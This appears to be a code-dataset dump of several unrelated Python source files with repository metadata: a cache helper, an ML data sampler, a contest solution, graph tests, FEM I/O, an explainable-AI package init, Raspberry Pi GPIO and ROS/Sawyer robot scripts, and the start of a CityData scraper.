json_string = json.dumps(data, sort_keys=False, indent=4)
if add_extension:
filename += '.json'
with open(join(_cache_path, filename), 'w') as f:
f.write(json_string)
def read(filename):
"""
Reads a file from the cache and unpickles it.
Keyword Arguments:
- filename: name of the file to read
Returns:
- data: unpickled object
"""
if _log_actions:
cprint('Loading from cache: "{}"'.format(filename), 'green')
return joblib.load(join(_cache_path, filename))
def read_multiple(filenames):
"""
Reads multiple file from the cache and unpickles them.
Keyword Arguments:
- filenames: names of the files to read
Returns:
- result: unpickled object
- success_files: list of successful filenames
- errors: filenames for which exceptions happened
"""
result = []
success_files = []
errors = []
for f in filenames:
try:
result.append(read(f))
success_files.append(f)
except Exception as e:
cprint(f'Loading {f} failed!', 'red')
cprint(e, 'red')
errors.append(f)
return result, success_files, errors
def read_plain(filename):
"""
Reads a file from the cache and unpickles it.
Keyword Arguments:
- filename: name of the file to read
Returns:
- data: unpickled object
"""
if _log_actions:
cprint('Loading from cache: "{}"'.format(filename), 'green')
return Path(join(_cache_path, filename)).read_text()
def delete(filename):
"""
Removes all files from the cache that have names starting with filename.
"""
deleted = 0
errors = 0
for f in entries():
try:
if f.startswith(filename):
remove(join(_cache_path, f))
deleted += 1
except:
cprint(f'Cannot remove from cache: {filename}', 'red')
errors += 1
cprint(f'Removed from cache all files starting with {filename}', 'green')
msg = f'Removed {deleted} files, {errors} errors'
cprint(msg, 'yellow')
return {
'type': 'success' if errors == 0 else 'error',
'msg': msg
}
def delete_all_clf_projs():
"""
Deletes all classifier projections
"""
deleted = 0
errors = 0
for f in entries():
try:
if '__clf_proj_' in f:
remove(join(_cache_path, f))
deleted += 1
except:
cprint(f'Cannot remove from cache: {f}', 'red')
errors += 1
cprint(f'Removed from cache all classifier projections', 'green')
msg = f'Removed {deleted} files, {errors} errors'
cprint(msg, 'yellow')
return {
'type': 'success' if errors == 0 else 'error',
'msg': msg
}
def clear():
"""
Deletes the cache.
"""
cprint('Clearing cache', 'yellow')
shutil.rmtree(_cache_path, ignore_errors=True)
def entries():
"""
Lists all files in the cache.
Returns:
- list of all file names in the cache directory
"""
return [f for f in listdir(_cache_path) if isfile(join(_cache_path, f))]
def content():
"""
Returns all .json files in the cache to allow showing what
classifiers etc. have been trained so far.
Returns:
- a dictionary containing all files' contents
"""
cached_files = entries()
json_files = [f for f in cached_files if f.endswith('_args.json')]
datasets = []
classifiers = []
projections = []
classifier_projections = []
for f in json_files:
try:
filepath = join(_cache_path, f)
contents = Path(filepath).read_text()
json_dict = {
'file': f,
'args': json.loads(contents)
}
if '__proj_' in f:
projections.append(json_dict)
elif '__clf_proj_' in f:
classifier_projections.append(json_dict)
elif '__clf_' in f:
# send scores for cached classifications
score_file = f.replace('_args.json', '_scores.json')
scores = Path(join(_cache_path, score_file)).read_text()
json_dict['scores'] = json.loads(scores)
classifiers.append(json_dict)
elif f.startswith('data_'):
datasets.append(json_dict)
except Exception as e:
cprint(
f'Error: Some related files may be missing for file {f}, check if you copied files correctly or run you jobs again!', 'red')
cprint(e, 'red')
return {
'datasets': datasets,
'classifiers': classifiers,
'projections': projections,
'classifier_projections': classifier_projections
}
| 26.352697 | 140 | 0.597859 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,483 | 0.390962 |
7b00a8aae5f5c462bd8742df1743968940cbb675
| 8,123 |
py
|
Python
|
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | null | null | null |
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | null | null | null |
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | 1 |
2021-04-20T04:37:47.000Z
|
2021-04-20T04:37:47.000Z
|
import torch
import os
import numpy as np
import random
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from data.tileimages import *
from data.multitask import *
import fastai
from fastai.vision import *
class FoldSampler:
def __init__(self, TRAIN, LABELS,
mean, std, N,
tfms=[], sz=128,bs=16,
n_folds=4, uniform_augmentations=False,
shuffle_nonempty_imgs=False,
model_name=None,
is_train=True,
is_ordinal=False,
SEED=2020,
num_workers=4):
self._seed_everything(SEED)
self.SEED = SEED
self.tfms = tfms
self.mean = mean
self.std = std
self.N = N
self.nfolds = n_folds
self.TRAIN = TRAIN
self.sz = sz
self.bs = bs
self.is_ordinal = is_ordinal
self.is_train=is_train
self.num_workers=num_workers
self.model_name = model_name
self.uniform_augmentations = uniform_augmentations
self.shuffle_nonempty_imgs = shuffle_nonempty_imgs
self._prepare_data(TRAIN, LABELS)
self.df.head()
def _seed_everything(self, seed):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
def _cats4slide(self, image_id):
fn_cats = os.path.join(self.TRAIN, f'{image_id}_mask.txt')
if os.path.isfile(fn_cats):
with open(fn_cats) as f:
return [int(int(l)>1) for l in f.readlines()]
else:
raise Exception("File not found", str(fn_cats))
def _findAllReplicates(self, pairs, seed):
replicates = [seed]
nodes = [seed]
def addReplicate(n):
if n not in replicates:
replicates.append(n)
nodes.append(n)
# while there are nodes left
while len(nodes) > 0:
this_node = nodes[0]
for i,j in pairs:
if i==this_node:
# match - add j to replicates
addReplicate(j)
elif j==this_node:
# match - add i to replicates
addReplicate(i)
nodes.pop(0)
return replicates
def _pairs2sameFolds(self, df,pairs):
replicate_indices = np.unique(pairs)
split_values = df.split.values
for ind in replicate_indices:
allReps = self._findAllReplicates(list(pairs), ind)
# set all to the same fold as the minimum index
min_rep = min(allReps)
target_fold = split_values[min_rep]
for rep in allReps:
split_values[rep] = target_fold
df.split = split_values
return df
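    # Worked example for the two helpers above (hypothetical pairs): with
    # pairs = [[0, 3], [3, 7]], rows 0, 3 and 7 form one connected group and
    # all three are assigned to the fold of the lowest index, row 0.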
def _prepare_data(self, TRAIN, LABELS):
df = pd.read_csv(LABELS).set_index('image_id')
files = set([p[:32] for p in os.listdir(TRAIN)])
df = df.loc[files]
df = df.reset_index()
df['stratify'] = df.data_provider.map(str) + '-' + df.isup_grade.map(str)
splits = StratifiedKFold(n_splits=self.nfolds, random_state=self.SEED, shuffle=True)
splits = list(splits.split(df,df.stratify))
folds_splits = np.zeros(len(df)).astype(np.int)
for i in range(self.nfolds): folds_splits[splits[i][1]] = i
df['split'] = folds_splits
if self.is_ordinal:
def _transform_ordinal(label):
#return ','.join([str(i) for i in range(int(label) + 1)])
return ','.join([str(i) for i in range(int(label))])
df.isup_grade = df.isup_grade.apply(_transform_ordinal)
# add tile cancer categories if present in train data
if self.model_name in ["multihead_tilecat", "multihead_tilecat_attention"]:
cancer_labels = np.array([np.array(self._cats4slide(image_id)) for image_id in df.image_id.values])
for i in range(cancer_labels.shape[1]):
df[f'cancer_status_{i}'] = list(cancer_labels[:,i])
# set serial section replicates to same folds
pairs_fn = os.path.join('../','pair_indices.npy')
if os.path.exists(pairs_fn):
pairs = np.load(pairs_fn)
print(f'Setting {np.array(pairs).shape[0]} serial section replicates to same folds')
df = self._pairs2sameFolds(df, pairs)
self.df = df
def get_data(self,fold=0, **kwargs):
model_name = "iafoss" if self.model_name is None else self.model_name
regr = "regr" in model_name
def __MImageItemList():
""" This returns MImageItemList with specified defaults """
return MImageItemList.from_df(self.df,
path='.',
folder=self.TRAIN,
cols='image_id',
sz=self.sz,
N=self.N,
mean=self.mean,
std=self.std,
uniform_augmentations=self.uniform_augmentations,
shuffle_nonempty_imgs=self.shuffle_nonempty_imgs
)
if model_name in ["multihead_tilecat", "multihead_tilecat_attention"] and self.is_train:
# create isup LabelItemList
isup_labels = (
(__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade']))
)
# create the dict to hold all LabelItemLists
multitask_project = {
'isup': {
'label_lists': isup_labels,
}
}
# add tile cancer categories to the dict
for i in range(self.N):
tilecat = (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=[f'cancer_status_{i}']))
multitask_project[f'tilecat_{i}'] = {
'label_lists': tilecat,
}
ItemLists.label_from_mt_project = label_from_mt_project
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_mt_project(multitask_project)
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
else: # Defaults to Iafoss
if self.is_ordinal:
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade'], label_cls=None, label_delim=',')
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
else:
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade'], label_cls=FloatList if regr==True else None)
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
| 40.819095 | 111 | 0.519266 | 7,892 | 0.971562 | 0 | 0 | 0 | 0 | 0 | 0 | 934 | 0.114982 |
7b0127f18652a5554693ea5f44876da7eca25e09
| 281 |
py
|
Python
|
ABC/194/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
ABC/194/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
ABC/194/a.py
|
fumiyanll23/AtCoder
|
362ca9fcacb5415c1458bc8dee5326ba2cc70b65
|
[
"MIT"
] | null | null | null |
def main():
# input
A, B = map(int, input().split())
# compute
# output
if A+B>=15 and B >= 8:
print(1)
elif A+B>=10 and B>=3:
print(2)
elif A+B >= 3:
print(3)
else:
print(4)
if __name__ == '__main__':
main()
| 14.05 | 36 | 0.441281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.120996 |
7b0281efeed9226063f79960fa17b68b47603613
| 2,578 |
py
|
Python
|
test/graph/test_from_ase.py
|
yhtang/GraphDot
|
3d5ed4fbb2f6912052baa42780b436da76979691
|
[
"BSD-3-Clause-LBNL"
] | 9 |
2020-02-14T18:07:39.000Z
|
2021-12-15T12:07:31.000Z
|
test/graph/test_from_ase.py
|
yhtang/graphdot
|
3d5ed4fbb2f6912052baa42780b436da76979691
|
[
"BSD-3-Clause-LBNL"
] | 3 |
2020-03-19T19:07:26.000Z
|
2021-02-24T06:08:51.000Z
|
test/graph/test_from_ase.py
|
yhtang/graphdot
|
3d5ed4fbb2f6912052baa42780b436da76979691
|
[
"BSD-3-Clause-LBNL"
] | 3 |
2019-10-17T06:11:18.000Z
|
2021-05-07T11:56:33.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
from ase.build import molecule
from ase.lattice.cubic import SimpleCubic
from graphdot.graph import Graph
from graphdot.graph.adjacency import AtomicAdjacency
adjacencies = [
AtomicAdjacency(shape='tent1', length_scale=1.0, zoom=1),
AtomicAdjacency(shape='tent2', length_scale='vdw_radius', zoom=1),
AtomicAdjacency(
shape='gaussian', length_scale='covalent_radius_pyykko', zoom=1.5
),
AtomicAdjacency(shape='compactbell3,2'),
]
def test_ase_one():
atoms = molecule('H2')
graph = Graph.from_ase(atoms)
assert(len(graph.nodes) == 2)
assert(len(graph.edges) == 1)
@pytest.mark.parametrize('atoms', [
SimpleCubic(latticeconstant=2, size=(2, 1, 1), symbol='Cu', pbc=(1, 0, 0)),
SimpleCubic(latticeconstant=2, size=(1, 2, 1), symbol='Cu', pbc=(0, 1, 0)),
SimpleCubic(latticeconstant=2, size=(1, 1, 2), symbol='Cu', pbc=(0, 0, 1)),
])
@pytest.mark.parametrize('adj', adjacencies)
def test_ase_pbc1(atoms, adj):
graph_pbc = Graph.from_ase(atoms, use_pbc=True, adjacency=adj)
graph_nopbc = Graph.from_ase(atoms, use_pbc=False, adjacency=adj)
assert(len(graph_pbc.edges) == len(graph_nopbc.edges))
@pytest.mark.parametrize('atoms', [
SimpleCubic(latticeconstant=2, size=(3, 1, 1), symbol='Cu', pbc=(1, 0, 0)),
SimpleCubic(latticeconstant=2, size=(4, 1, 1), symbol='Cu', pbc=(1, 0, 0)),
SimpleCubic(latticeconstant=2, size=(7, 1, 1), symbol='Cu', pbc=(1, 0, 0)),
SimpleCubic(latticeconstant=2, size=(1, 3, 1), symbol='Cu', pbc=(0, 1, 0)),
SimpleCubic(latticeconstant=2, size=(1, 4, 1), symbol='Cu', pbc=(0, 1, 0)),
SimpleCubic(latticeconstant=2, size=(1, 7, 1), symbol='Cu', pbc=(0, 1, 0)),
SimpleCubic(latticeconstant=2, size=(1, 1, 3), symbol='Cu', pbc=(0, 0, 1)),
SimpleCubic(latticeconstant=2, size=(1, 1, 4), symbol='Cu', pbc=(0, 0, 1)),
SimpleCubic(latticeconstant=2, size=(1, 1, 7), symbol='Cu', pbc=(0, 0, 1)),
])
def test_ase_pbc2(atoms):
adj = AtomicAdjacency(shape='tent1', length_scale=1.0, zoom=1)
graph_pbc = Graph.from_ase(atoms, use_pbc=True, adjacency=adj)
graph_nopbc = Graph.from_ase(atoms, use_pbc=False, adjacency=adj)
assert(len(graph_pbc.edges) > len(graph_nopbc.edges))
@pytest.mark.parametrize('atoms', [
molecule('H2'),
molecule('CH4'),
molecule('CH3COOH'),
SimpleCubic(latticeconstant=1, size=(3, 3, 1), symbol='Cu', pbc=(1, 1, 0)),
])
def test_ase(atoms):
g = Graph.from_ase(atoms)
assert(len(g.nodes) == len(atoms))
assert(len(g.edges) > 0)
| 38.477612 | 79 | 0.660978 | 0 | 0 | 0 | 0 | 1,899 | 0.736618 | 0 | 0 | 227 | 0.088053 |
7b02e549c87583bcf554b71f024544d0bb0dac0a
| 2,735 |
py
|
Python
|
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
import string
import scipy
import PslgIo, ElementAwarePslg
def loadEle(filename):
pslg = ElementAwarePslg.ElementAwarePslg()
file = open(filename, "r")
try:
PslgIo.readFromFile(file, pslg, filename)
finally:
file.close()
return pslg
def saveFem(filename, femResults):
#Open the file
file = open(filename, "w")
#Header
line = saveHeader(file, len(femResults), femResults[0][1].shape[0])
#Actual contents
try:
for solutionDesc in femResults:
saveResult(file, solutionDesc)
finally:
file.close()
return
def saveResult(file, solutionDesc):
file.write(str(solutionDesc[0]) + "\n")
for i in range(0, solutionDesc[1].shape[0]):
line = "%.12f" % solutionDesc[1][i,0]
file.write(line + "\n")
file.flush()
def saveRelease(file, releaseDesc):
file.write(str(releaseDesc[0]) + "\t" + str(releaseDesc[1]) + "\n")
file.flush()
def saveHeader(file, timeSteps, variableNumber):
line = str(timeSteps) + " " + str(variableNumber) + "\n"
file.write(line)
file.flush()
def loadFem(filename):
results = []
file = open(filename, "r")
try:
resultNumber, n = readHeader(file)
for i in range(0, resultNumber):
time = float(getLine(file))
z = []
for j in range(0, n):
currentZ = float(getLine(file))
z.append(currentZ)
results.append((time, z))
finally:
file.close()
return results
def loadLastFemresult(filename):
result = None
file = open(filename, "r")
try:
#Skip header
resultNumber, n = readHeader(file)
currentLine = getLine(file)
while len(currentLine) > 0:
#Get the current record
time = float(currentLine)
z = []
for j in range(0, n):
currentZ = float(getLine(file))
z.append(currentZ)
result = (time, z)
#Get next line
currentLine = getLine(file)
except:
pass
finally:
file.close()
if(result is not None):
return (result[0], scipy.array([result[1]]).transpose())
else:
return None
def readHeader(file):
headerLine = getLine(file)
if len(headerLine) > 0:
tokens = string.split(headerLine)
if len(tokens) != 2:
raise IOError("Invalid file format (header should contain exactly two positive integers)")
return (int(tokens[0]), int(tokens[1]))
else:
raise IOError("Invalid file format (header not found)")
def getLine(file):
return string.strip(file.readline())
| 27.35 | 102 | 0.571115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 243 | 0.088848 |
7b04376d12aae979563b6b36b34ff0b76d2dcff0
| 3,466 |
py
|
Python
|
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
"""
DIANNA: Deep Insight And Neural Network Analysis.
Modern scientific challenges are often tackled with (Deep) Neural Networks (DNN).
Despite their high predictive accuracy, DNNs lack inherent explainability. Many DNN
users, especially scientists, do not harvest DNNs power because of lack of trust and
understanding of their working.
Meanwhile, the eXplainable AI (XAI) methods offer some post-hoc interpretability and
insight into the DNN reasoning. This is done by quantifying the relevance of individual
features (image pixels, words in text, etc.) with respect to the prediction. These
"relevance heatmaps" indicate how the network has reached its decision directly in the
input modality (images, text, speech etc.) of the data.
There are many Open Source Software (OSS) implementations of these methods, alas,
supporting a single DNN format and the libraries are known mostly by the AI experts.
The DIANNA library supports the best XAI methods in the context of scientific usage
providing their OSS implementation based on the ONNX standard and demonstrations on
benchmark datasets. Representing visually the captured knowledge by the AI system can
become a source of (scientific) insights.
See https://github.com/dianna-ai/dianna
"""
import logging
from onnx_tf.backend import prepare # To avoid Access Violation on Windows with SHAP
from . import methods
from . import utils
logging.getLogger(__name__).addHandler(logging.NullHandler())
__author__ = "DIANNA Team"
__email__ = "[email protected]"
__version__ = "0.2.1"
def explain_image(model_or_function, input_data, method, labels=(1,), **kwargs):
"""
Explain an image (input_data) given a model and a chosen method.
Args:
model_or_function (callable or str): The function that runs the model to be explained _or_
the path to a ONNX model on disk.
input_data (np.ndarray): Image data to be explained
method (string): One of the supported methods: RISE, LIME or KernelSHAP
labels (tuple): Labels to be explained
Returns:
One heatmap (2D array) per class.
"""
explainer = _get_explainer(method, kwargs)
explain_image_kwargs = utils.get_kwargs_applicable_to_function(explainer.explain_image, kwargs)
return explainer.explain_image(model_or_function, input_data, labels, **explain_image_kwargs)
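# Hedged usage sketch for explain_image (the model path and input image are
# hypothetical placeholders; 'RISE' is one of the methods listed in the docstring):
#
#   import numpy as np
#   import dianna
#   image = np.random.random((224, 224, 3))
#   heatmaps = dianna.explain_image('model.onnx', image, method='RISE', labels=(0, 1))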
def explain_text(model_or_function, input_data, method, labels=(1,), **kwargs):
"""
Explain text (input_data) given a model and a chosen method.
Args:
model_or_function (callable or str): The function that runs the model to be explained _or_
the path to a ONNX model on disk.
input_data (string): Text to be explained
method (string): One of the supported methods: RISE or LIME
labels (tuple): Labels to be explained
Returns:
List of (word, index of word in raw text, importance for target class) tuples.
"""
explainer = _get_explainer(method, kwargs)
explain_text_kwargs = utils.get_kwargs_applicable_to_function(explainer.explain_text, kwargs)
return explainer.explain_text(model_or_function, input_data, labels, **explain_text_kwargs)
def _get_explainer(method, kwargs):
method_class = getattr(methods, method)
method_kwargs = utils.get_kwargs_applicable_to_function(method_class.__init__, kwargs)
return method_class(**method_kwargs)
| 42.790123 | 99 | 0.742643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,388 | 0.688979 |
7b0494a9e41efc09a0891a5e4ffe2bfd4e84d0d3
| 2,925 |
py
|
Python
|
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
try:
import RPi.GPIO as GPIO
except RuntimeError:
print("Error importing RPi.GPIO! This is probably because you need "
"superuser privileges. You can achieve this by using 'sudo' to run "
"your script")
gpios = [7, 8, 10, 11, 12, 13, 15, 16, 18, 19, 21, 22, 23, 24, 26, 29,
31, 32, 33, 35, 36, 37, 38, 40]
class Pin:
def __init__(self, number, value):
self.number = number
self.value = value
self.mode = 'out'
def set_value(self, value):
try:
GPIO.output(self.number, GPIO.HIGH if value else GPIO.LOW)
except:
pass
self.value = value
def set_mode(self, mode):
if mode == 'in' or mode == 'out':
self.mode = mode
try:
if mode == 'in':
GPIO.setup(self.number, GPIO.IN)
self.value = bool(GPIO.input(self.number))
print("set mode to in (value=" + str(self.value) + ")")
return self.value
else:
GPIO.setup(self.number, GPIO.OUT)
self.value = bool(GPIO.input(self.number))
print("set mode to out (value=" + str(self.value) + ")")
return self.value
except:
return self.value
def switch_value(self):
try:
GPIO.output(self.number, GPIO.LOW if self.value else GPIO.HIGH)
except:
pass
self.value = not self.value
def switch_mode(self):
if self.mode == 'out':
return 'in', self.set_mode('in')
else:
return 'out', self.set_mode('out')
class Header:
def __init__(self):
self.left_pins = []
self.right_pins = []
for x in gpios:
if x % 2 == 1:
self.left_pins.append(Pin(x, False))
else:
self.right_pins.append(Pin(x, False))
def get_value(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
return pin.value
def set_value(self, number, value):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
pin.set_value(value)
break
def switch_value(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
pin.switch_value()
break
def switch_mode(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
return pin.switch_mode()
header = Header()
try:
GPIO.setmode(GPIO.BOARD)
for id in gpios:
print('Initializing gpio ' + str(id))
GPIO.setup(id, GPIO.OUT, initial=GPIO.LOW)
print('Initialized GPIOs')
except:
print('Could not set GPIO mode to BOARD.')
| 29.545455 | 79 | 0.523419 | 2,318 | 0.792479 | 0 | 0 | 0 | 0 | 0 | 0 | 315 | 0.107692 |
7b04e005435865593cbdccc3f6d9e91235157df4
| 1,395 |
py
|
Python
|
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | null | null | null |
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | 1 |
2017-12-14T14:04:24.000Z
|
2017-12-14T16:58:05.000Z
|
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import rospy # For all things ros with python
# JointState is defined in sensor_msgs.msg
# If you know a message but not where it is
# call rosmsg info MSGNAME from the terminal
from sensor_msgs.msg import JointState
# This tutorial takes heavily from
# http://wiki.ros.org/ROS/Tutorials/WritingPublisherSubscriber(python)
# In this example we make a simple subscriber that listens for JointState
# messages, and prints them. Uses a functional approach.
def message_callback(msg):
"""This function is called on the message every time a message arrives."""
rospy.loginfo("Joint position received:"+str(msg.position))
def joint_listener():
"""Blocking function that sets up node, subscription and waits for
messages."""
# Start ros node
rospy.init_node("joint_listener", anonymous=True)
# Tell the central command we want to hear about /joint_states
rospy.Subscriber("/joint_states", # Topic we subscribe to
JointState, # message type that topic has
message_callback) # function to call when message arrives
rospy.spin()
# If this script is run alone, not just imported:
if __name__ == "__main__":
joint_listener()
# Ensure that the python script is executable by running:
# chmod +x joint_subscriber.py
# Call this script by running:
# rosrun joint_subscriber joint_subscriber.py
| 34.875 | 79 | 0.7319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,019 | 0.730466 |
7b0521366a87b5722240ee07005b1b01f21cf17a
| 1,291 |
py
|
Python
|
src/lab4_cam/src/sawyercam.py
|
citronella3alain/baxterDraw
|
c050254e8b4b8d4f5087e8743a34289844138e0c
|
[
"MIT"
] | null | null | null |
src/lab4_cam/src/sawyercam.py
|
citronella3alain/baxterDraw
|
c050254e8b4b8d4f5087e8743a34289844138e0c
|
[
"MIT"
] | null | null | null |
src/lab4_cam/src/sawyercam.py
|
citronella3alain/baxterDraw
|
c050254e8b4b8d4f5087e8743a34289844138e0c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Aran Sena 2018
#
# Code example only, provided without guarantees
#
# Example for how to get both cameras streaming together
#
####
import rospy
from intera_core_msgs.srv._IOComponentCommandSrv import IOComponentCommandSrv
from intera_core_msgs.msg._IOComponentCommand import IOComponentCommand
def camera_command_client(camera, status, timeout=0.0):
rospy.wait_for_service('/io/internal_camera/' + camera + '/command')
try:
cam_control = rospy.ServiceProxy('/io/internal_camera/' + camera + '/command', IOComponentCommandSrv)
cmd = IOComponentCommand()
cmd.time = rospy.Time.now()
cmd.op = 'set'
if status:
cmd.args = '{"signals": {"camera_streaming": {"data": [true], "format": {"type": "bool"}}}}'
else:
cmd.args = '{"signals": {"camera_streaming": {"data": [false], "format": {"type": "bool"}}}}'
resp = cam_control(cmd, timeout)
print resp
except rospy.ServiceException, e:
print "Service call failed: %s"%e
if __name__ == '__main__':
rospy.init_node('camera_command_client')
camera_command_client(camera='head_camera', status=True)
camera_command_client(camera='right_hand_camera', status=True)
| 33.102564 | 110 | 0.655306 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 478 | 0.370256 |
7b061600468274d3cebd155c75fff8f1303d7256
| 12,279 |
py
|
Python
|
citydata/crime.py
|
JackKirbyCook82/neighborhood
|
3805fa11890e121ffadcaaf8f02323434cb68519
|
[
"MIT"
] | null | null | null |
citydata/crime.py
|
JackKirbyCook82/neighborhood
|
3805fa11890e121ffadcaaf8f02323434cb68519
|
[
"MIT"
] | null | null | null |
citydata/crime.py
|
JackKirbyCook82/neighborhood
|
3805fa11890e121ffadcaaf8f02323434cb68519
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun May 2 2021
@name: CityData CensusTract Download Application
@author: Jack Kirby Cook
"""
import sys
import os.path
import warnings
import logging
import regex as re
MAIN_DIR = os.path.dirname(os.path.realpath(__file__))
MODULE_DIR = os.path.abspath(os.path.join(MAIN_DIR, os.pardir))
ROOT_DIR = os.path.abspath(os.path.join(MODULE_DIR, os.pardir))
RESOURCE_DIR = os.path.join(ROOT_DIR, "resources")
SAVE_DIR = os.path.join(ROOT_DIR, "save")
DRIVER_FILE = os.path.join(RESOURCE_DIR, "chromedriver.exe")
REPOSITORY_DIR = os.path.join(SAVE_DIR, "citydata")
QUEUE_FILE = os.path.join(RESOURCE_DIR, "zipcodes.zip.csv")
REPORT_FILE = os.path.join(SAVE_DIR, "citydata", "censustracts.csv")
if ROOT_DIR not in sys.path:
sys.path.append(ROOT_DIR)
from utilities.iostream import InputParser
from utilities.dataframes import dataframe_parser
from webscraping.webtimers import WebDelayer
from webscraping.webdrivers import WebDriver
from webscraping.weburl import WebURL
from webscraping.webpages import WebBrowserPage
from webscraping.webpages import BadRequestError
from webscraping.webpages import WebContents
from webscraping.webloaders import WebLoader
from webscraping.webquerys import WebQuery, WebDatasets
from webscraping.webqueues import WebScheduler
from webscraping.webdownloaders import WebDownloader, CacheMixin, AttemptsMixin
from webscraping.webdata import WebClickable, WebText, WebInput, WebSelect
from webscraping.webactions import WebScroll, WebMoveTo, WebMoveToClick, WebMoveToClickSelect, WebMoveToClickFillSend
__version__ = "1.0.0"
__author__ = "Jack Kirby Cook"
__all__ = ["CityData_WebDelayer", "CityData_WebDownloader", "CityData_WebScheduler"]
__copyright__ = "Copyright 2021, Jack Kirby Cook"
__license__ = ""
LOGGER = logging.getLogger(__name__)
warnings.filterwarnings("ignore")
DATASETS = {"violentcrime": "Crime - Violent crime index", "propertycrime": "Crime - Property crime index", "airpollution": "Air pollution - Air Quality Index (AQI)"}
GEOGRAPHYS = ("state", "county", "tract", "blockgroup")
dataset_select_xpath = r"//select[contains(@id, 'selmapOSM')]"
zipcode_click_xpath = r"//div[@id='searchOSM']//div[contains(@id, 'sboxOuter')]//b"
zipcode_input_xpath = r"//div[@id='searchOSM']//div[contains(@id, 'sboxOuter')]//input[contains(@id, 's2id')]"
zipcode_xpath = r"//div[@id='searchOSM']//div[contains(@id, 'sboxOuter')]//span[@class='select2-chosen']"
geography_xpath = r"//div[@id='legendBOX']/div[@id='mapOSM_legend']"
canvas_xpath = r"//div[@id='mapOSM']//canvas"
fullscreen_xpath = r"//div[@id='mapOSM']//a[@title='Full Screen']"
zoomin_xpath = r"//div[@id='mapOSM']//a[@title='Zoom in']"
zoomout_xpath = r"//div[@id='mapOSM']//a[@title='Zoom out']"
dataset_select_webloader = WebLoader(xpath=dataset_select_xpath)
zipcode_click_webloader = WebLoader(xpath=zipcode_click_xpath)
zipcode_input_webloader = WebLoader(xpath=zipcode_input_xpath)
zipcode_webloader = WebLoader(xpath=zipcode_xpath)
geography_webloader = WebLoader(xpath=geography_xpath)
canvas_webloader = WebLoader(xpath=canvas_xpath)
fullscreen_webloader = WebLoader(xpath=fullscreen_xpath)
zoomin_webloader = WebLoader(xpath=zoomin_xpath)
zoomout_webloader = WebLoader(xpath=zoomout_xpath)
